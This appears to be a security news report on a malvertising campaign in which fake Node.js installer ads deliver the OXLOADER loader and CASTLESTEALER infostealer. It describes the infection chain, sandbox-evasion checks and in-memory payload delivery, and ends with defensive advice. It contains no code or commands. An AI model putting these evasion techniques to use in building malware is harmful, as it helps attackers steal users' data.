Google Ads Impersonate Node.js Installer to Deploy Infostealer Malware

Key Takeaways

• Threat actors are leveraging malicious Google Ads to distribute a new malware loader, OXLOADER, disguised as the Node.js installer.
• The campaign primarily targets Windows users in the United States, deploying the sophisticated CASTLESTEALER infostealer after a single click on a deceptive ad.
• OXLOADER employs advanced anti-analysis techniques, including sandbox detection and obfuscation, resulting in extremely low detection rates.
• Google has removed the malicious advertiser account and associated campaigns, but the techniques used highlight a persistent threat to users relying on search engine results for software downloads.

Sophisticated Infostealer Campaign Leverages Malicious Google Ads

A new, highly evasive malware loader, dubbed OXLOADER, is being disseminated through fraudulent Google Ads that impersonate the official Node.js installer. This sophisticated campaign, detailed in a recent security report by Elastic Security Labs, targets Windows users in the United States, surreptitiously installing the dangerous CASTLESTEALER infostealer onto compromised machines.

The attack chain exploits a common user behavior: searching for software online and trusting prominent search results. Threat actors established a convincing, malicious landing page designed to mimic the legitimate Node.js platform. Upon clicking a sponsored ad, victims are covertly redirected through an intermediary domain to download a malicious Windows batch script. This script is hosted on a legitimate cloud file-sharing service, a tactic that significantly reduces its likelihood of being flagged by conventional security tools.

Elastic Security Labs researchers identified this active campaign, confirming it had targeted one of their customers. The report highlighted that OXLOADER was previously undocumented and exhibited remarkably low detection rates across both static antivirus engines and automated sandbox environments.

Campaign Details and Google’s Response

The malicious campaign operated via Google Ads, with the advertiser account registered under a verified name linked to Ukraine. Google took action by May 14, 2026, removing the advertiser and all associated campaigns. The last recorded appearance of the deceptive ad was April 23, 2026.

What makes this particular attack concerning is the seamless integration of threat actors into trusted platforms. This allowed them to deliver their payload without immediately raising alarms. The final payload, CASTLESTEALER, is a .NET-based infostealer designed to harvest sensitive data from infected systems.

Infection Chain and OXLOADER’s Stealth Tactics

The infection process initiates when a user searches for the Node.js installer and clicks on a sponsored Google search result. This action redirects the user to a fake landing page crafted to appear identical to the official Node.js website.

From this deceptive page, an intermediary domain facilitates the download of a malicious batch script. This script is hosted on Storj, a legitimate cloud storage service, deliberately abused by the attackers to bypass reputation-based filtering and enhance the campaign’s stealth.

The batch script further masks its malicious intent by presenting a convincing fake software installation wizard, providing victims with no immediate reason for suspicion. Concurrently, it silently downloads the next-stage executable using PowerShell and triggers a Windows User Account Control (UAC) prompt to gain elevated system privileges. The entire user experience is engineered to mimic a routine software installation, thereby minimizing suspicion.

A second variant of OXLOADER was discovered on May 13, 2026. This version masqueraded as a Node.js installer binary, rather than API Monitor, maintaining the campaign’s deceptive theme. Researchers noted that the filename intentionally included “node” to reinforce the illusion of a legitimate Node.js download.

How OXLOADER Evades Detection

OXLOADER is engineered with sophisticated evasion capabilities. Prior to executing its primary malicious functions, it performs five distinct checks to determine if it is operating within a sandbox or virtual machine environment. These checks include verifying a minimum of three CPU cores, at least 3 GB of physical RAM, a display refresh rate exceeding 20 Hz, and confirming that the system is not located in a CIS region or configured for the Russian language.

The loader also employs advanced obfuscation techniques that disrupt standard binary analysis tools, making reverse engineering a challenging and time-consuming process. It embeds malicious code within the Windows .reloc section, an area not typically used for executable instructions by legitimate programs. It then unpacks itself in memory using self-modifying decryption routines.

The ultimate payload, CASTLESTEALER, is delivered entirely in memory using DonutLoader, an open-source shellcode generator. This in-memory execution strategy leaves minimal traces on disk, further complicating detection and forensic analysis.

What You Should Do

• Exercise Extreme Caution with Sponsored Search Results: Treat sponsored search results for developer tools and other software with heightened scrutiny. Malicious actors frequently exploit advertising platforms.
• Verify Software Downloads: Always download software directly from official vendor websites. Do not rely solely on search engine results, even if they appear at the top.
• Enable and Configure Endpoint Security: Ensure endpoint behavioral detection is actively enabled and configured for prevention, not just monitoring. This can help identify and block suspicious activities even if initial files evade static detection.
• Implement Network Traffic Monitoring: Monitor network traffic for unusual connections or data exfiltration attempts, especially from newly installed applications.
• Educate Users: Regularly train developers and other employees on the risks of malvertising and the importance of verifying software sources.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.